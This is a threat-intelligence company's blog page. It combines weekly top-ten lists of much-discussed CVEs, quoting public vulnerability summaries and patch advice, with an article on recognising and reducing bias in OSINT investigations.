Anyone in a business or organisation who has responsibility for online security
CTOs or senior managers who want to understand why there is a critical need for a service like SOS Intelligence
IT / Cyber Security teams
Business owners who are worried about the recent cyber attacks in the UK

What we will cover:

NEW Key Features

SSO
Better UX
Threat Tracker
Domain Monitor
DARKMAP rebuild and improvements
On demand RFIs
Vulnerability Intelligence

Our AI Analyst

Fully Integrated, private LLM agent
Alert Analysis
Content Analysis
Natural Language querying

Hosted by Jon Moss and SOS Intelligence Founder and CEO, Amir Hadzipasic

Sign up to the webinar to receive a recording via email if you cannot attend on the day. By signing up you will also receive our newsletter for future events. You can always unsubscribe with one click.

Photo by Headway on Unsplash

CVE Top 10

The SOS Intelligence CVE Chatter Weekly Top Ten – 19 May 2025

by Amir Hadzipasic

May 19, 2025

This weekly blog post is from via our unique intelligence collection pipelines. We are your eyes and ears online, including the Dark Web.

There are thousands of vulnerability discussions each week. SOS Intelligence gathers a list of the most discussed Common Vulnerabilities and Exposures (CVE) online for the previous week.

We make every effort to ensure the accuracy of the data presented. As this is an automated process some errors may creep in.

If you are feeling generous please do make us aware of anything you spot, feel free to follow us on Twitter @sosintel and DM us. Thank you!

1. CVE-2024-10687

https://nvd.nist.gov/vuln/detail/CVE-2024-10687

2. CVE-2024-21060

https://nvd.nist.gov/vuln/detail/CVE-2024-21060

3. CVE-2024-45332

Exposure of sensitive information caused by shared microarchitectural predictor state that influences transient execution in the indirect branch predictors for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.

https://nvd.nist.gov/vuln/detail/CVE-2024-45332

4. CVE-2025-27920

Output Messenger before 2.0.63 was vulnerable to a directory traversal attack through improper file path handling. By using ../ sequences in parameters, attackers could access sensitive files outside the intended directory, potentially leading to configuration leakage or arbitrary file access.

https://nvd.nist.gov/vuln/detail/CVE-2025-27920

5. CVE-2024-21887

https://nvd.nist.gov/vuln/detail/CVE-2024-21887

6. CVE-2020-8516

The daemon in Tor through 0.4.1.8 and 0.4.2.x through 0.4.2.6 does not verify that a rendezvous node is known before attempting to connect to it, which might make it easier for remote attackers to discover circuit information. NOTE: The network team of Tor claims this is an intended behavior and not a vulnerability

https://nvd.nist.gov/vuln/detail/CVE-2020-8516

7. CVE-2021-34527

A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

UPDATE July 7, 2021: The security update for Windows Server 2012, Windows Server 2016 and Windows 10, Version 1607 have been released. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. If you are unable to install these updates, see the FAQ and Workaround sections in this CVE for information on how to help protect your system from this vulnerability.

In addition to installing the updates, in order to secure your system, you must confirm that the following registry settings are set to 0 (zero) or are not defined (Note: These registry keys do not exist by default, and therefore are already at the secure setting.), also that your Group Policy setting are correct (see FAQ):

HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows NTPrintersPointAndPrint
NoWarningNoElevationOnInstall = 0 (DWORD) or not defined (default setting)
UpdatePromptSettings = 0 (DWORD) or not defined (default setting)

Having NoWarningNoElevationOnInstall set to 1 makes your system vulnerable by design.

UPDATE July 6, 2021: Microsoft has completed the investigation and has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. If you are unable to install these updates, see the FAQ and Workaround sections in this CVE for information on how to help protect your system from this vulnerability. See also KB5005010: Restricting installation of new printer drivers after applying the July 6, 2021 updates.

Note that the security updates released on and after July 6, 2021 contain protections for CVE-2021-1675 and the additional remote code execution exploit in the Windows Print Spooler service known as “PrintNightmare”, documented in CVE-2021-34527.

https://nvd.nist.gov/vuln/detail/CVE-2021-34527

8. CVE-2024-3400

A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.

Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.

https://nvd.nist.gov/vuln/detail/CVE-2024-3400

9. CVE-2019-17671

In WordPress before 5.2.4, unauthenticated viewing of certain content is possible because the static query property is mishandled.

https://nvd.nist.gov/vuln/detail/CVE-2019-17671

10. CVE-2017-5638

The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.

https://nvd.nist.gov/vuln/detail/CVE-2017-5638

CVE Top 10

The SOS Intelligence CVE Chatter Weekly Top Ten – 12 May 2025

by Amir Hadzipasic

May 12, 2025

This weekly blog post is from via our unique intelligence collection pipelines. We are your eyes and ears online, including the Dark Web.

There are thousands of vulnerability discussions each week. SOS Intelligence gathers a list of the most discussed Common Vulnerabilities and Exposures (CVE) online for the previous week.

We make every effort to ensure the accuracy of the data presented. As this is an automated process some errors may creep in.

If you are feeling generous please do make us aware of anything you spot, feel free to follow us on Twitter @sosintel and DM us. Thank you!

1. CVE-2022-44666

Windows Contacts Remote Code Execution Vulnerability

https://nvd.nist.gov/vuln/detail/CVE-2022-44666

2. CVE-2023-47246

In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.

https://nvd.nist.gov/vuln/detail/CVE-2023-47246

3. CVE-2025-29824

Use after free in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally.

https://nvd.nist.gov/vuln/detail/CVE-2025-29824

4. CVE-2023-35947

Gradle is a build tool with a focus on build automation and support for multi-language development. In affected versions when unpacking Tar archives, Gradle did not check that files could be written outside of the unpack location. This could lead to important files being overwritten anywhere the Gradle process has write permissions. For a build reading Tar entries from a Tar archive, this issue could allow Gradle to disclose information from sensitive files through an arbitrary file read. To exploit this behavior, an attacker needs to either control the source of an archive already used by the build or modify the build to interact with a malicious archive. It is unlikely that this would go unnoticed. A fix has been released in Gradle 7.6.2 and 8.2 to protect against this vulnerability. Starting from these versions, Gradle will refuse to handle Tar archives which contain path traversal elements in a Tar entry name. Users are advised to upgrade. There are no known workarounds for this vulnerability.

### Impact

This is a path traversal vulnerability when Gradle deals with Tar archives, often referenced as TarSlip, a variant of ZipSlip.

* When unpacking Tar archives, Gradle did not check that files could be written outside of the unpack location. This could lead to important files being overwritten anywhere the Gradle process has write permissions.
* For a build reading Tar entries from a Tar archive, this issue could allow Gradle to disclose information from sensitive files through an arbitrary file read.

To exploit this behavior, an attacker needs to either control the source of an archive already used by the build or modify the build to interact with a malicious archive. It is unlikely that this would go unnoticed.

Gradle uses Tar archives for its [Build Cache](https://docs.gradle.org/current/userguide/build_cache.html). These archives are safe when created by Gradle. But if an attacker had control of a remote build cache server, they could inject malicious build cache entries that leverage this vulnerability. This attack vector could also be exploited if a man-in-the-middle can be performed between the remote cache and the build.

### Patches

A fix has been released in Gradle 7.6.2 and 8.2 to protect against this vulnerability. Starting from these versions, Gradle will refuse to handle Tar archives which contain path traversal elements in a Tar entry name.

It is recommended that users upgrade to a patched version.

### Workarounds

There is no workaround.

* If your build deals with Tar archives that you do not fully trust, you need to inspect them to confirm they do not attempt to leverage this vulnerability.
* If you use the Gradle remote build cache, make sure only trusted parties have write access to it and that connections to the remote cache are properly secured.

### References

* [CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)](https://cwe.mitre.org/data/definitions/22.html)
* [Gradle Build

https://nvd.nist.gov/vuln/detail/CVE-2023-35947

5. CVE-2025-1323

The WP-Recall – Registration, Profile, Commerce & More plugin for WordPress is vulnerable to SQL Injection via the ‘databeat’ parameter in all versions up to, and including, 16.26.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

https://nvd.nist.gov/vuln/detail/CVE-2025-1323

6. CVE-2025-27007

Incorrect Privilege Assignment vulnerability in Brainstorm Force SureTriggers allows Privilege Escalation.This issue affects SureTriggers: from n/a through 1.0.82.

https://nvd.nist.gov/vuln/detail/CVE-2025-27007

7. CVE-2024-4577

In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use “Best-Fit” behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.

https://nvd.nist.gov/vuln/detail/CVE-2024-4577

8. CVE-2021-41773

A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration “require all denied”, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.

https://nvd.nist.gov/vuln/detail/CVE-2021-41773

9. CVE-2022-44690

Microsoft SharePoint Server Remote Code Execution Vulnerability

https://nvd.nist.gov/vuln/detail/CVE-2022-44690

10. CVE-2023-21433

Improper access control vulnerability in Galaxy Store prior to version 4.5.49.8 allows local attackers to install applications from Galaxy Store.

https://nvd.nist.gov/vuln/detail/CVE-2023-21433

Opinion, OSINT

Seeing Clearly: Understanding and Addressing Bias in OSINT

by Daniel Collyer

May 7, 2025

Open-source intelligence (OSINT) has become an essential part of modern investigations, threat analysis, and decision-making. By leveraging publicly available information from the surface web, social media, forums, and more obscure corners of the internet, OSINT practitioners can uncover insights without the need for intrusive or covert methods. But as with any form of intelligence gathering, the process is far from objective.

Bias — whether introduced by the analyst, the tools used, or the sources themselves — can significantly distort findings. In an age where data is vast, varied, and often unverified, understanding and mitigating bias is not just good practice, it’s a necessity.

In this blog post, we’ll explore the different types of bias that can affect OSINT, from unconscious assumptions to platform-driven distortions. We’ll also look at the real-world consequences of unchecked bias and offer practical steps to help analysts and organisations reduce its impact. Because when it comes to intelligence, clarity and objectivity are key — and bias is the silent threat that clouds both.

What Is Bias in OSINT?

Bias, in the context of OSINT, refers to any distortion or influence that affects how information is collected, interpreted, or presented. It can arise from a wide range of sources — the tools we use, the platforms we search, the assumptions we bring with us, and even the way we frame our intelligence requirements.

Importantly, bias isn’t always intentional. Much of it operates at a subconscious level, shaped by cultural norms, past experiences, professional habits, or institutional practices. And in OSINT — where we often deal with vast, unstructured, and fast-moving data — even small biases can significantly skew the outcome of an investigation.

Bias can enter the OSINT process at every stage. It may influence the types of sources we prioritise, the way we interpret ambiguous content, or the confidence we place in particular findings. Analysts may unconsciously favour information that supports a working theory, or dismiss data that doesn’t align with an expected narrative. Meanwhile, digital tools and search algorithms can subtly reinforce these patterns, feeding analysts what they’re likely to click on — not necessarily what’s most accurate or relevant.

Recognising the presence of bias is the first step in mitigating its effects. In the sections that follow, we’ll explore some of the most common types of bias in OSINT work, and how they can impact the quality and reliability of our intelligence.

Types of Bias Common in OSINT

Bias in OSINT can creep in at any stage of the intelligence lifecycle — from the moment an analyst frames a question, to the sources they choose, the tools they rely on, and how they interpret the information gathered. These biases, often unconscious, can impact the reliability, relevance, and objectivity of an intelligence product. Below are the most prevalent types of bias that OSINT practitioners should be aware of, alongside examples and mitigation tips.

Selection Bias

Selection bias arises when the information an analyst collects is not representative of the broader landscape, often because certain types of sources or platforms are favoured over others. This can be due to habit, language familiarity, ease of access, or time constraints.

Example:
An analyst researching political disinformation may rely heavily on Twitter data, missing coordinated narratives being pushed on Telegram or region-specific platforms like VK or Weibo.

Why it matters:
If the selected sources don’t reflect the full spectrum of available information, the resulting intelligence may be incomplete, misleading, or skewed towards a particular narrative or demographic.

How to reduce it:

Use a diverse set of platforms and media types (forums, blogs, videos, alt-tech sites).
Include regional and language-specific sources wherever possible.
Revisit and regularly reassess your go-to sources to prevent over-reliance.

Confirmation Bias

Confirmation bias is the tendency to look for or interpret information in a way that supports an existing hypothesis or belief, while disregarding evidence that contradicts it. This is especially common when an analyst is under pressure to produce a “smoking gun” or validate a stakeholder’s expectations.

Example:
While investigating a suspected nation-state actor, an analyst focuses exclusively on TTPs (Tactics, Techniques, and Procedures) associated with that actor, ignoring signs that the activity could point to a different group or a false flag operation.

Why it matters:
Confirmation bias can lead to poor attribution, misinformed decisions, or ineffective mitigation strategies. It also limits an analyst’s ability to explore alternative hypotheses.

How to reduce it:

Apply structured analytic techniques such as the Analysis of Competing Hypotheses (ACH).
Collaborate with other analysts to test assumptions and encourage critical challenge.
Document reasoning and acknowledge uncertainty in assessments.

Language and Cultural Bias

Language barriers and cultural unfamiliarity can affect how information is gathered and interpreted. Analysts working in a second language — or relying on machine translation — may misread tone, sarcasm, or idiomatic expressions. Cultural norms can also impact how certain behaviours are perceived.

Example:
An English-speaking analyst may misinterpret the tone of Arabic-language social media posts due to literal translation, mistaking satire or frustration for calls to violence.

Why it matters:
Poor interpretation can lead to false positives, mischaracterisation of intent, or overlooking local context. This is particularly critical in geopolitical, extremist, or criminal investigations.

How to reduce it:

Use native speakers or trusted translation partners when possible.
Consult regional experts for cultural insight.
Avoid making assumptions based solely on automated translations or surface-level interpretations.

Tool and Platform Bias

The tools we use to collect and analyse data are not neutral. Search engines, social media platforms, and scraping tools all apply filters, ranking algorithms, and personalisation — often without the user’s awareness. This can prioritise certain types of content and bury others, skewing the analyst’s perception of what is prevalent or important.

Example:
Google search results vary depending on location, search history, and user profile. An analyst may believe a narrative is trending globally when in fact it’s only prominent in their localised feed.

Why it matters:
Platform bias can lead to a false sense of consensus or popularity. It also risks amplifying certain voices while suppressing dissenting ones.

How to reduce it:

Use multiple search engines and anonymised browsers (e.g. Tor or VPNs).
Test queries in incognito/private browsing modes.
Be aware of default settings in commercial tools — understand what’s being excluded or prioritised.

Data Availability Bias

Data availability bias refers to the over-reliance on information that is easiest to find, most recent, or most abundant. Analysts may gravitate towards high-volume data sources (like Reddit or Twitter) because they are continuously updated and easy to search — at the expense of smaller, less visible sources that may be more valuable.

Example:
An OSINT report on cybercriminal activity may cite dozens of tweets and blog posts but fail to include key discussions taking place in closed forums or encrypted messaging groups.

Why it matters:
The quantity of available data doesn’t always equate to quality or relevance. Prioritising what’s visible over what’s essential can distort the intelligence picture and give a false sense of completeness.

How to reduce it:

Establish clear intelligence requirements before collection begins.
Allocate time to seek out hard-to-find or niche sources.
Treat gaps in data as a signal — not just an absence.

Together, these biases form a web of influence that can compromise even the most well-intentioned investigations.

Real-World Consequences of Bias in OSINT

Bias in OSINT isn’t just a theoretical concern — it has real-world implications. When unchecked, bias can lead to flawed assessments, damaged reputations, operational missteps, and even legal or ethical breaches. Whether you’re conducting corporate investigations, monitoring geopolitical events, or assessing cyber threats, the integrity of your findings depends on how rigorously you confront bias throughout the process.

Here are some key consequences of biased OSINT!

Flawed Decision-Making

Biased intelligence can feed directly into poor decisions, especially in fast-moving environments where leadership relies heavily on OSINT to shape strategy or response.

Example:
A security team monitoring social unrest misinterprets online sentiment due to over-reliance on English-language Twitter data. As a result, they misjudge the timing and location of protest activity, leading to inadequate resource allocation and reputational damage for the organisation.

Impact:
Misinformed decisions can result in financial losses, safety risks, or missed opportunities to intervene early in an emerging threat.

Inaccurate Attribution and Threat Profiling

In cyber threat intelligence, OSINT is often used to support attribution — linking incidents to actors or groups. Bias in source selection or interpretation can lead to false conclusions about who is behind an attack or what their motives might be.

Example:
An analyst attributes a phishing campaign to a well-known ransomware gang based on superficial similarities to a past incident, without exploring the possibility of copycat tactics. Later evidence reveals the activity was the work of a different actor altogether.

Impact:
Faulty attribution may lead to targeting the wrong group, damaging diplomatic relationships, or overlooking the true threat actor.

Overlooking Emerging Threats

Bias towards mainstream or high-visibility platforms can cause analysts to miss activity in fringe spaces where new narratives or tactics often emerge first.

Example:
While monitoring disinformation around an election, analysts focus on Facebook and YouTube but fail to detect early mobilisation efforts on fringe platforms like 4chan or niche messaging channels.

Impact:
Failure to detect early-stage planning or sentiment shifts can delay mitigation efforts and allow threats to escalate unchecked.

Reputational and Legal Risks

If an organisation bases public statements or internal actions on flawed OSINT, it could face reputational fallout — or worse, legal consequences.

Example:
A company issues a threat advisory naming a suspected actor based on an OSINT report later revealed to be based on misinterpreted data. The accused actor contests the findings publicly, leading to reputational damage and potential liability.

Impact:
Poorly substantiated claims can erode trust in your organisation’s intelligence capabilities and create significant legal exposure.

Analyst Burnout and Operational Inefficiency

Constantly chasing data that confirms a pre-existing view can lead to tunnel vision and missed insight. It also increases cognitive load, as analysts struggle to reconcile contradictory findings with an inflexible narrative.

Example:
An intelligence team spends weeks reinforcing an incorrect assumption because early findings were never challenged. Late-stage doubts lead to rework and missed deadlines.

Impact:
Bias drains time, undermines analyst confidence, and reduces the overall efficiency of the OSINT process.

By understanding and acknowledging these consequences, OSINT professionals can treat bias not just as a theoretical flaw but as a practical risk — one that can and should be actively mitigated. In the next section, we’ll explore how to do exactly that: recognising bias in your own process, and adopting safeguards to reduce its impact.

How to Identify and Mitigate Bias in OSINT Investigations

Tackling bias in OSINT isn’t about eliminating it entirely — that’s virtually impossible. Instead, the goal is to recognise where bias may creep in, actively question your assumptions, and build safeguards into your processes to keep your intelligence as accurate, balanced, and reliable as possible. Below are key strategies for identifying and mitigating bias throughout the OSINT lifecycle.

Develop Self-Awareness and Encourage Critical Thinking

Awareness is the first step. Bias is often unconscious, so analysts must learn to reflect on their own thought processes and remain open to challenge.

Tips:

Ask yourself: “What assumptions am I making here?”
Encourage peer review within your team — a second set of eyes can catch blind spots you might miss.
Maintain a mindset of curiosity over certainty. Avoid becoming too attached to an early hypothesis.

Use Structured Analytic Techniques (SATs)

Structured Analytic Techniques are proven tools to help analysts explore alternative explanations, test assumptions, and reduce cognitive traps.

Recommended techniques:

Analysis of Competing Hypotheses (ACH): List all possible explanations and evaluate evidence for and against each.
Red Teaming: Have a colleague deliberately challenge your assumptions and present counter-arguments.
Devil’s Advocacy: Take an opposing viewpoint to test the strength of your conclusions.

These methods are particularly valuable in high-stakes or high-uncertainty investigations where bias may have the greatest impact.

Diversify Sources and Tools

One of the most effective ways to reduce selection and tool bias is to cast a wide net. Avoid relying on a narrow set of familiar platforms or sources.

Tips:

Include mainstream, alternative, and fringe platforms in your data collection.
Use both commercial and open-source OSINT tools — each may present data differently.
Search in multiple languages where possible, or use translated queries to gain a broader view.

Regularly audit your sources and collection methods to ensure they remain appropriate for the task.

Separate Collection from Analysis

Where feasible, keep data collection and analysis distinct. This can help prevent your search strategy from being shaped by what you hope to find.

Tips:

Assign data gathering to one team member and analysis to another, if resources allow.
Use neutral search terms during collection to avoid biasing the dataset.
Create a clear intelligence requirement or question to guide your scope objectively.

This separation adds discipline to your workflow and supports a more neutral intelligence product.

Document Your Reasoning and Assumptions

Transparency in your process is essential — both for collaboration and for bias mitigation. Document how conclusions were reached, including what evidence was used, what was discarded, and why.

Benefits:

Makes your work more defensible in the event of challenge or scrutiny.
Helps you revisit past assessments to refine or revise conclusions with new evidence.
Supports better peer review and organisational learning.

Where possible, annotate your findings with source reliability ratings and confidence levels.

Build in Time for Reflection and Review

Tight deadlines often amplify bias, as there’s little opportunity to question results. Wherever possible, build in time to reflect on findings and review them with fresh eyes.

Tips:

Schedule a “cooling-off” period before finalising assessments, especially on complex or high-risk topics.
Use checklists to perform a final bias audit before dissemination.
Encourage cross-team or external feedback if time allows.

Bias in OSINT is inevitable — but it doesn’t have to define the quality of your work. With the right tools, habits, and organisational culture, it’s possible to create intelligence products that are more balanced, resilient, and actionable.

Embedding Bias Awareness into OSINT Workflows and Culture

Bias mitigation shouldn’t just be left to individual analysts — it must be baked into the wider workflows, processes, and culture of any team or organisation that relies on OSINT. When bias awareness becomes part of the operational fabric, the result is more reliable intelligence, better decision-making, and a stronger ethical foundation.

Here’s how teams can embed this mindset more broadly:

Establish Clear Intelligence Requirements

Start with a well-defined intelligence question. Vague or overly broad tasks increase the risk of confirmation bias or irrelevant collection.

What this looks like:

Define the “who, what, when, where, and why” before collection begins.
Break down large requests into smaller, more focused components.
Ensure tasking is reviewed and agreed by relevant stakeholders to reduce personal bias shaping direction.

Standardise Collection and Documentation Processes

Create workflows that encourage consistency and transparency at every stage of the OSINT cycle.

Steps to implement:

Use templates for reporting and note-taking that include fields for source evaluation, confidence levels, and assumptions.
Standardise how tools and sources are chosen and justify their use.
Make documentation a non-negotiable part of your intelligence output.

This not only reduces bias but also improves reproducibility and quality control.

Foster a Culture of Challenge and Peer Review

Healthy teams encourage respectful disagreement and regular feedback. Challenge should be seen not as confrontation, but as a key part of refining thinking.

How to build this in:

Hold regular review sessions or “intelligence stand-ups” where analysts discuss findings and alternative views.
Designate a “red team” or devil’s advocate role for larger projects.
Encourage cross-functional reviews involving technical, regional, or language specialists where possible.

Psychological safety — where analysts feel comfortable voicing concerns or dissent — is key to making this work.

Provide Ongoing Training and Awareness

Bias awareness isn’t a one-off exercise. Continuous professional development helps teams stay sharp, challenge assumptions, and stay updated with new tools or methods.

Training focus areas:

Cognitive bias and structured analytic techniques.
Source validation and reliability frameworks.
Diversity in online platforms and information ecosystems.

Don’t overlook the value of non-technical skills, such as critical thinking, logic, and media literacy.

Use Technology Thoughtfully, Not Blindly

Automated tools can speed up analysis, but they can also entrench bias if they’re not used carefully. Algorithms are only as objective as the data and assumptions behind them.

Best practices:

Understand the limitations of any tool, especially those that involve language processing, sentiment analysis, or trend detection.
Regularly assess whether tools introduce their own selection bias (e.g. geolocation limits, language barriers).
Avoid over-reliance on dashboards or outputs without context — always layer automated findings with human judgment.

Reflect and Evolve

Build regular retrospectives into your team’s rhythm. Reflect on where bias may have influenced past projects, and use that to refine future practice.

Prompts to consider:

Were any key perspectives or sources missed?
Were assumptions tested adequately?
How did the team handle dissent or uncertainty?

This institutional learning helps embed bias mitigation into your organisational muscle memory.

By putting these cultural and procedural supports in place, organisations move beyond individual effort and towards systemic resilience. When bias awareness becomes a shared value — not just a box-ticking exercise — the result is a more ethical, accurate, and credible OSINT function.

SOS Intelligence Ransomware Statistics October 23

The Value of Bias-Aware OSINT

Bias is an unavoidable part of human thinking, and by extension, of open-source intelligence. But acknowledging its presence isn’t a weakness — it’s a strength. When analysts and organisations recognise where bias can occur and actively work to reduce its influence, the result is not only better intelligence but also more ethical, credible, and impactful work.

Bias-aware OSINT isn’t about striving for some mythical state of total objectivity. Instead, it’s about developing good habits: questioning assumptions, diversifying sources, documenting reasoning, and creating space for challenge and reflection. It’s about embedding checks and balances into both individual workflows and team culture.

In an era where misinformation spreads quickly and decision-makers rely heavily on timely, accurate information, the stakes for getting OSINT right have never been higher. Building bias-aware practices into your investigations isn’t just good tradecraft — it’s an essential part of being a responsible intelligence professional.

By staying curious, critical, and collaborative, we can all do our part to ensure the intelligence we produce stands up to scrutiny and serves its intended purpose — helping others make better-informed decisions.

Header photo by Christian Lue on Unsplash.

CVE Top 10

The SOS Intelligence CVE Chatter Weekly Top Ten – 05 May 2025

by Amir Hadzipasic

May 5, 2025

This weekly blog post is from via our unique intelligence collection pipelines. We are your eyes and ears online, including the Dark Web.

There are thousands of vulnerability discussions each week. SOS Intelligence gathers a list of the most discussed Common Vulnerabilities and Exposures (CVE) online for the previous week.

We make every effort to ensure the accuracy of the data presented. As this is an automated process some errors may creep in.

If you are feeling generous please do make us aware of anything you spot, feel free to follow us on Twitter @sosintel and DM us. Thank you!

1. CVE-2018-17144

https://nvd.nist.gov/vuln/detail/CVE-2018-17144

2. CVE-2024-21060

https://nvd.nist.gov/vuln/detail/CVE-2024-21060

3. CVE-2024-10687

https://nvd.nist.gov/vuln/detail/CVE-2024-10687

4. CVE-2022-32666

In Wi-Fi, there is a possible low throughput due to misrepresentation of critical information. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: GN20220829014; Issue ID: GN20220829014.

https://nvd.nist.gov/vuln/detail/CVE-2022-32666

5. CVE-2021-32789

woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the `wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]` endpoint that allows the execution of a read only sql query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading.

https://nvd.nist.gov/vuln/detail/CVE-2021-32789

6. CVE-2025-2783

https://nvd.nist.gov/vuln/detail/CVE-2025-2783

7. CVE-2025-1323

https://nvd.nist.gov/vuln/detail/CVE-2025-1323

8. CVE-2025-32658

Deserialization of Untrusted Data vulnerability in wpWax HelpGent allows Object Injection. This issue affects HelpGent: from n/a through 2.2.4.

https://nvd.nist.gov/vuln/detail/CVE-2025-32658

9. CVE-2025-39462

Improper Control of Filename for Include/Require Statement in PHP Program (‘PHP Remote File Inclusion’) vulnerability in teamzt Smart Agreements allows PHP Local File Inclusion. This issue affects Smart Agreements: from n/a through 1.0.3.

https://nvd.nist.gov/vuln/detail/CVE-2025-39462

10. CVE-2024-3400

Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.

https://nvd.nist.gov/vuln/detail/CVE-2024-3400

Cookie	Duration	Description
cookielawinfo-checkbox-analytics	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checkbox-functional	11 months	The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checkbox-necessary	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-others	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-performance	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy	11 months	The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.

SOS Intelligence

Who Is SCATTERED SPIDER?

The Tools of the Trade: DragonForce RaaS

Why SCATTERED SPIDER’s Approach Is Especially Dangerous

Defending Against SCATTERED SPIDER: Practical Guidance

Security Culture Is Your Best Defence

Who is this for?

What we will cover:

Selection Bias

Confirmation Bias

Language and Cultural Bias

Tool and Platform Bias

Data Availability Bias

Real-World Consequences of Bias in OSINT

Flawed Decision-Making

Inaccurate Attribution and Threat Profiling

Overlooking Emerging Threats

Reputational and Legal Risks

Analyst Burnout and Operational Inefficiency

How to Identify and Mitigate Bias in OSINT Investigations

Use Structured Analytic Techniques (SATs)

Diversify Sources and Tools

Separate Collection from Analysis

Document Your Reasoning and Assumptions

Build in Time for Reflection and Review

Embedding Bias Awareness into OSINT Workflows and Culture

Establish Clear Intelligence Requirements

Standardise Collection and Documentation Processes

Foster a Culture of Challenge and Peer Review

Provide Ongoing Training and Awareness

Use Technology Thoughtfully, Not Blindly

Reflect and Evolve

The Value of Bias-Aware OSINT

Recent Posts

Recent Comments